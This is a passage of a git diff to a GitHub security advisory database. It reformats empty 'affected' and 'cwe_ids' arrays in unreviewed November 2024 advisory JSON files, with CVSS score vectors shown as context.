b/advisories/unreviewed/2024/11/GHSA-45w9-p29f-hp8r/GHSA-45w9-p29f-hp8r.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-46pf-6w9r-96r9/GHSA-46pf-6w9r-96r9.json b/advisories/unreviewed/2024/11/GHSA-46pf-6w9r-96r9/GHSA-46pf-6w9r-96r9.json index 6b4ac2ba298..483b70a9b9c 100644 --- a/advisories/unreviewed/2024/11/GHSA-46pf-6w9r-96r9/GHSA-46pf-6w9r-96r9.json +++ b/advisories/unreviewed/2024/11/GHSA-46pf-6w9r-96r9/GHSA-46pf-6w9r-96r9.json @@ -13,9 +13,7 @@ "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-47xc-86q6-rh6j/GHSA-47xc-86q6-rh6j.json b/advisories/unreviewed/2024/11/GHSA-47xc-86q6-rh6j/GHSA-47xc-86q6-rh6j.json index f21456b6dd9..1b887c73900 100644 --- a/advisories/unreviewed/2024/11/GHSA-47xc-86q6-rh6j/GHSA-47xc-86q6-rh6j.json +++ b/advisories/unreviewed/2024/11/GHSA-47xc-86q6-rh6j/GHSA-47xc-86q6-rh6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-4f7g-mqhx-8h4r/GHSA-4f7g-mqhx-8h4r.json b/advisories/unreviewed/2024/11/GHSA-4f7g-mqhx-8h4r/GHSA-4f7g-mqhx-8h4r.json index a4b7f5c514b..82792b0dc49 100644 --- a/advisories/unreviewed/2024/11/GHSA-4f7g-mqhx-8h4r/GHSA-4f7g-mqhx-8h4r.json +++ b/advisories/unreviewed/2024/11/GHSA-4f7g-mqhx-8h4r/GHSA-4f7g-mqhx-8h4r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-4jqw-mwqp-mhq2/GHSA-4jqw-mwqp-mhq2.json b/advisories/unreviewed/2024/11/GHSA-4jqw-mwqp-mhq2/GHSA-4jqw-mwqp-mhq2.json index 0d08d2142cf..d5ef15df4d4 100644 --- a/advisories/unreviewed/2024/11/GHSA-4jqw-mwqp-mhq2/GHSA-4jqw-mwqp-mhq2.json +++ b/advisories/unreviewed/2024/11/GHSA-4jqw-mwqp-mhq2/GHSA-4jqw-mwqp-mhq2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-4mww-gp9h-h59m/GHSA-4mww-gp9h-h59m.json b/advisories/unreviewed/2024/11/GHSA-4mww-gp9h-h59m/GHSA-4mww-gp9h-h59m.json index 117f77f60c6..a2ffee490fd 100644 --- a/advisories/unreviewed/2024/11/GHSA-4mww-gp9h-h59m/GHSA-4mww-gp9h-h59m.json +++ b/advisories/unreviewed/2024/11/GHSA-4mww-gp9h-h59m/GHSA-4mww-gp9h-h59m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-4r2r-hjrw-mpq6/GHSA-4r2r-hjrw-mpq6.json b/advisories/unreviewed/2024/11/GHSA-4r2r-hjrw-mpq6/GHSA-4r2r-hjrw-mpq6.json index aab66861646..2ab63d365ec 100644 --- a/advisories/unreviewed/2024/11/GHSA-4r2r-hjrw-mpq6/GHSA-4r2r-hjrw-mpq6.json +++ b/advisories/unreviewed/2024/11/GHSA-4r2r-hjrw-mpq6/GHSA-4r2r-hjrw-mpq6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-4xfh-5wgj-8xj9/GHSA-4xfh-5wgj-8xj9.json b/advisories/unreviewed/2024/11/GHSA-4xfh-5wgj-8xj9/GHSA-4xfh-5wgj-8xj9.json index 3977651f8d5..ed1d3163f54 100644 --- a/advisories/unreviewed/2024/11/GHSA-4xfh-5wgj-8xj9/GHSA-4xfh-5wgj-8xj9.json +++ b/advisories/unreviewed/2024/11/GHSA-4xfh-5wgj-8xj9/GHSA-4xfh-5wgj-8xj9.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-545p-76g5-36m8/GHSA-545p-76g5-36m8.json b/advisories/unreviewed/2024/11/GHSA-545p-76g5-36m8/GHSA-545p-76g5-36m8.json index eda73c6800b..c0742c17ce5 100644 --- a/advisories/unreviewed/2024/11/GHSA-545p-76g5-36m8/GHSA-545p-76g5-36m8.json +++ b/advisories/unreviewed/2024/11/GHSA-545p-76g5-36m8/GHSA-545p-76g5-36m8.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5655-8v36-fhx6/GHSA-5655-8v36-fhx6.json b/advisories/unreviewed/2024/11/GHSA-5655-8v36-fhx6/GHSA-5655-8v36-fhx6.json index 4dc5716d2a5..179ef67681d 100644 --- a/advisories/unreviewed/2024/11/GHSA-5655-8v36-fhx6/GHSA-5655-8v36-fhx6.json +++ b/advisories/unreviewed/2024/11/GHSA-5655-8v36-fhx6/GHSA-5655-8v36-fhx6.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5684-4xfg-mxj4/GHSA-5684-4xfg-mxj4.json b/advisories/unreviewed/2024/11/GHSA-5684-4xfg-mxj4/GHSA-5684-4xfg-mxj4.json index 54ba448c443..5095623f9bc 100644 --- a/advisories/unreviewed/2024/11/GHSA-5684-4xfg-mxj4/GHSA-5684-4xfg-mxj4.json +++ b/advisories/unreviewed/2024/11/GHSA-5684-4xfg-mxj4/GHSA-5684-4xfg-mxj4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-56rv-pwm3-v8q5/GHSA-56rv-pwm3-v8q5.json b/advisories/unreviewed/2024/11/GHSA-56rv-pwm3-v8q5/GHSA-56rv-pwm3-v8q5.json index 003f3f5daba..c24c36f8141 100644 --- a/advisories/unreviewed/2024/11/GHSA-56rv-pwm3-v8q5/GHSA-56rv-pwm3-v8q5.json +++ b/advisories/unreviewed/2024/11/GHSA-56rv-pwm3-v8q5/GHSA-56rv-pwm3-v8q5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-56xh-m8w2-qh6f/GHSA-56xh-m8w2-qh6f.json b/advisories/unreviewed/2024/11/GHSA-56xh-m8w2-qh6f/GHSA-56xh-m8w2-qh6f.json index 40adacbd35e..7c6e7fc048c 100644 --- a/advisories/unreviewed/2024/11/GHSA-56xh-m8w2-qh6f/GHSA-56xh-m8w2-qh6f.json +++ b/advisories/unreviewed/2024/11/GHSA-56xh-m8w2-qh6f/GHSA-56xh-m8w2-qh6f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-57g9-rw85-wg62/GHSA-57g9-rw85-wg62.json b/advisories/unreviewed/2024/11/GHSA-57g9-rw85-wg62/GHSA-57g9-rw85-wg62.json index 11cae96460c..e7a06545ed5 100644 --- a/advisories/unreviewed/2024/11/GHSA-57g9-rw85-wg62/GHSA-57g9-rw85-wg62.json +++ b/advisories/unreviewed/2024/11/GHSA-57g9-rw85-wg62/GHSA-57g9-rw85-wg62.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5fxv-92q8-4499/GHSA-5fxv-92q8-4499.json b/advisories/unreviewed/2024/11/GHSA-5fxv-92q8-4499/GHSA-5fxv-92q8-4499.json index ad60a48cbbc..627ef9053c5 100644 --- a/advisories/unreviewed/2024/11/GHSA-5fxv-92q8-4499/GHSA-5fxv-92q8-4499.json +++ b/advisories/unreviewed/2024/11/GHSA-5fxv-92q8-4499/GHSA-5fxv-92q8-4499.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5g36-2x7r-j898/GHSA-5g36-2x7r-j898.json b/advisories/unreviewed/2024/11/GHSA-5g36-2x7r-j898/GHSA-5g36-2x7r-j898.json index 968e38d2aff..b7961fb90d1 100644 --- a/advisories/unreviewed/2024/11/GHSA-5g36-2x7r-j898/GHSA-5g36-2x7r-j898.json +++ b/advisories/unreviewed/2024/11/GHSA-5g36-2x7r-j898/GHSA-5g36-2x7r-j898.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5h2m-w4xr-fxpq/GHSA-5h2m-w4xr-fxpq.json b/advisories/unreviewed/2024/11/GHSA-5h2m-w4xr-fxpq/GHSA-5h2m-w4xr-fxpq.json index f78d2bbcca2..c5ce7b1be83 100644 --- a/advisories/unreviewed/2024/11/GHSA-5h2m-w4xr-fxpq/GHSA-5h2m-w4xr-fxpq.json +++ b/advisories/unreviewed/2024/11/GHSA-5h2m-w4xr-fxpq/GHSA-5h2m-w4xr-fxpq.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5jf7-53jh-gpxm/GHSA-5jf7-53jh-gpxm.json b/advisories/unreviewed/2024/11/GHSA-5jf7-53jh-gpxm/GHSA-5jf7-53jh-gpxm.json index 01f38419b88..1d88fa0960b 100644 --- a/advisories/unreviewed/2024/11/GHSA-5jf7-53jh-gpxm/GHSA-5jf7-53jh-gpxm.json +++ b/advisories/unreviewed/2024/11/GHSA-5jf7-53jh-gpxm/GHSA-5jf7-53jh-gpxm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5p69-3rp7-542w/GHSA-5p69-3rp7-542w.json b/advisories/unreviewed/2024/11/GHSA-5p69-3rp7-542w/GHSA-5p69-3rp7-542w.json index 791d0ad21bd..6429e80e366 100644 --- a/advisories/unreviewed/2024/11/GHSA-5p69-3rp7-542w/GHSA-5p69-3rp7-542w.json +++ b/advisories/unreviewed/2024/11/GHSA-5p69-3rp7-542w/GHSA-5p69-3rp7-542w.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-5q62-p8xf-7hfj/GHSA-5q62-p8xf-7hfj.json b/advisories/unreviewed/2024/11/GHSA-5q62-p8xf-7hfj/GHSA-5q62-p8xf-7hfj.json index 1e534442e9b..f7415dacc56 100644 --- a/advisories/unreviewed/2024/11/GHSA-5q62-p8xf-7hfj/GHSA-5q62-p8xf-7hfj.json +++ b/advisories/unreviewed/2024/11/GHSA-5q62-p8xf-7hfj/GHSA-5q62-p8xf-7hfj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-62j5-qc8j-5cjx/GHSA-62j5-qc8j-5cjx.json b/advisories/unreviewed/2024/11/GHSA-62j5-qc8j-5cjx/GHSA-62j5-qc8j-5cjx.json index a3b8db6bbfd..ea2ddeb6d42 100644 --- a/advisories/unreviewed/2024/11/GHSA-62j5-qc8j-5cjx/GHSA-62j5-qc8j-5cjx.json +++ b/advisories/unreviewed/2024/11/GHSA-62j5-qc8j-5cjx/GHSA-62j5-qc8j-5cjx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-643q-8gx3-hf55/GHSA-643q-8gx3-hf55.json b/advisories/unreviewed/2024/11/GHSA-643q-8gx3-hf55/GHSA-643q-8gx3-hf55.json index 21d0deba963..a1532a888e0 100644 --- a/advisories/unreviewed/2024/11/GHSA-643q-8gx3-hf55/GHSA-643q-8gx3-hf55.json +++ b/advisories/unreviewed/2024/11/GHSA-643q-8gx3-hf55/GHSA-643q-8gx3-hf55.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-658w-f28g-3j4h/GHSA-658w-f28g-3j4h.json b/advisories/unreviewed/2024/11/GHSA-658w-f28g-3j4h/GHSA-658w-f28g-3j4h.json index 43f3d997789..5839bfb73fc 100644 --- a/advisories/unreviewed/2024/11/GHSA-658w-f28g-3j4h/GHSA-658w-f28g-3j4h.json +++ b/advisories/unreviewed/2024/11/GHSA-658w-f28g-3j4h/GHSA-658w-f28g-3j4h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6c4v-4rmp-px63/GHSA-6c4v-4rmp-px63.json b/advisories/unreviewed/2024/11/GHSA-6c4v-4rmp-px63/GHSA-6c4v-4rmp-px63.json index 4aab8d1360f..241c38c664d 100644 --- a/advisories/unreviewed/2024/11/GHSA-6c4v-4rmp-px63/GHSA-6c4v-4rmp-px63.json +++ b/advisories/unreviewed/2024/11/GHSA-6c4v-4rmp-px63/GHSA-6c4v-4rmp-px63.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6g43-mf5q-88rc/GHSA-6g43-mf5q-88rc.json b/advisories/unreviewed/2024/11/GHSA-6g43-mf5q-88rc/GHSA-6g43-mf5q-88rc.json index c574f8cb5f6..dd05578ec89 100644 --- a/advisories/unreviewed/2024/11/GHSA-6g43-mf5q-88rc/GHSA-6g43-mf5q-88rc.json +++ b/advisories/unreviewed/2024/11/GHSA-6g43-mf5q-88rc/GHSA-6g43-mf5q-88rc.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6h8r-5h72-v53h/GHSA-6h8r-5h72-v53h.json b/advisories/unreviewed/2024/11/GHSA-6h8r-5h72-v53h/GHSA-6h8r-5h72-v53h.json index f93d06051f2..04d9a499c7a 100644 --- a/advisories/unreviewed/2024/11/GHSA-6h8r-5h72-v53h/GHSA-6h8r-5h72-v53h.json +++ b/advisories/unreviewed/2024/11/GHSA-6h8r-5h72-v53h/GHSA-6h8r-5h72-v53h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6j3m-gfx7-f9rp/GHSA-6j3m-gfx7-f9rp.json b/advisories/unreviewed/2024/11/GHSA-6j3m-gfx7-f9rp/GHSA-6j3m-gfx7-f9rp.json index 0c25359501c..c93685c1531 100644 --- a/advisories/unreviewed/2024/11/GHSA-6j3m-gfx7-f9rp/GHSA-6j3m-gfx7-f9rp.json +++ b/advisories/unreviewed/2024/11/GHSA-6j3m-gfx7-f9rp/GHSA-6j3m-gfx7-f9rp.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6rch-pvx5-r93q/GHSA-6rch-pvx5-r93q.json b/advisories/unreviewed/2024/11/GHSA-6rch-pvx5-r93q/GHSA-6rch-pvx5-r93q.json index c9c26e27299..57c704443bf 100644 --- a/advisories/unreviewed/2024/11/GHSA-6rch-pvx5-r93q/GHSA-6rch-pvx5-r93q.json +++ b/advisories/unreviewed/2024/11/GHSA-6rch-pvx5-r93q/GHSA-6rch-pvx5-r93q.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6vgq-8qjq-h578/GHSA-6vgq-8qjq-h578.json b/advisories/unreviewed/2024/11/GHSA-6vgq-8qjq-h578/GHSA-6vgq-8qjq-h578.json index bdf6320dedb..41646d75dbc 100644 --- a/advisories/unreviewed/2024/11/GHSA-6vgq-8qjq-h578/GHSA-6vgq-8qjq-h578.json +++ b/advisories/unreviewed/2024/11/GHSA-6vgq-8qjq-h578/GHSA-6vgq-8qjq-h578.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6w5w-j428-gfp7/GHSA-6w5w-j428-gfp7.json b/advisories/unreviewed/2024/11/GHSA-6w5w-j428-gfp7/GHSA-6w5w-j428-gfp7.json index 98074c613e9..1500e893bb6 100644 --- a/advisories/unreviewed/2024/11/GHSA-6w5w-j428-gfp7/GHSA-6w5w-j428-gfp7.json +++ b/advisories/unreviewed/2024/11/GHSA-6w5w-j428-gfp7/GHSA-6w5w-j428-gfp7.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6wf3-mrmw-6v2f/GHSA-6wf3-mrmw-6v2f.json b/advisories/unreviewed/2024/11/GHSA-6wf3-mrmw-6v2f/GHSA-6wf3-mrmw-6v2f.json index 7960a2b6213..d8daee937ed 100644 --- a/advisories/unreviewed/2024/11/GHSA-6wf3-mrmw-6v2f/GHSA-6wf3-mrmw-6v2f.json +++ b/advisories/unreviewed/2024/11/GHSA-6wf3-mrmw-6v2f/GHSA-6wf3-mrmw-6v2f.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-6x85-j5hx-4hj5/GHSA-6x85-j5hx-4hj5.json b/advisories/unreviewed/2024/11/GHSA-6x85-j5hx-4hj5/GHSA-6x85-j5hx-4hj5.json index 6cc60bd1e51..f2275d16996 100644 --- a/advisories/unreviewed/2024/11/GHSA-6x85-j5hx-4hj5/GHSA-6x85-j5hx-4hj5.json +++ b/advisories/unreviewed/2024/11/GHSA-6x85-j5hx-4hj5/GHSA-6x85-j5hx-4hj5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-73jc-g6m2-j62g/GHSA-73jc-g6m2-j62g.json b/advisories/unreviewed/2024/11/GHSA-73jc-g6m2-j62g/GHSA-73jc-g6m2-j62g.json index 9ed6eb2ed93..c183cbd40dd 100644 --- a/advisories/unreviewed/2024/11/GHSA-73jc-g6m2-j62g/GHSA-73jc-g6m2-j62g.json +++ b/advisories/unreviewed/2024/11/GHSA-73jc-g6m2-j62g/GHSA-73jc-g6m2-j62g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-7679-9xw6-2858/GHSA-7679-9xw6-2858.json b/advisories/unreviewed/2024/11/GHSA-7679-9xw6-2858/GHSA-7679-9xw6-2858.json index 9114aa71ecb..cabc59f6203 100644 --- a/advisories/unreviewed/2024/11/GHSA-7679-9xw6-2858/GHSA-7679-9xw6-2858.json +++ b/advisories/unreviewed/2024/11/GHSA-7679-9xw6-2858/GHSA-7679-9xw6-2858.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-76f5-r74w-9h63/GHSA-76f5-r74w-9h63.json b/advisories/unreviewed/2024/11/GHSA-76f5-r74w-9h63/GHSA-76f5-r74w-9h63.json index 5e10734987e..62979a54962 100644 --- a/advisories/unreviewed/2024/11/GHSA-76f5-r74w-9h63/GHSA-76f5-r74w-9h63.json +++ b/advisories/unreviewed/2024/11/GHSA-76f5-r74w-9h63/GHSA-76f5-r74w-9h63.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-78hj-7cr6-hq8q/GHSA-78hj-7cr6-hq8q.json b/advisories/unreviewed/2024/11/GHSA-78hj-7cr6-hq8q/GHSA-78hj-7cr6-hq8q.json index 0554617fe13..98a8f3c3eda 100644 --- a/advisories/unreviewed/2024/11/GHSA-78hj-7cr6-hq8q/GHSA-78hj-7cr6-hq8q.json +++ b/advisories/unreviewed/2024/11/GHSA-78hj-7cr6-hq8q/GHSA-78hj-7cr6-hq8q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-7ch8-mh59-262m/GHSA-7ch8-mh59-262m.json b/advisories/unreviewed/2024/11/GHSA-7ch8-mh59-262m/GHSA-7ch8-mh59-262m.json index 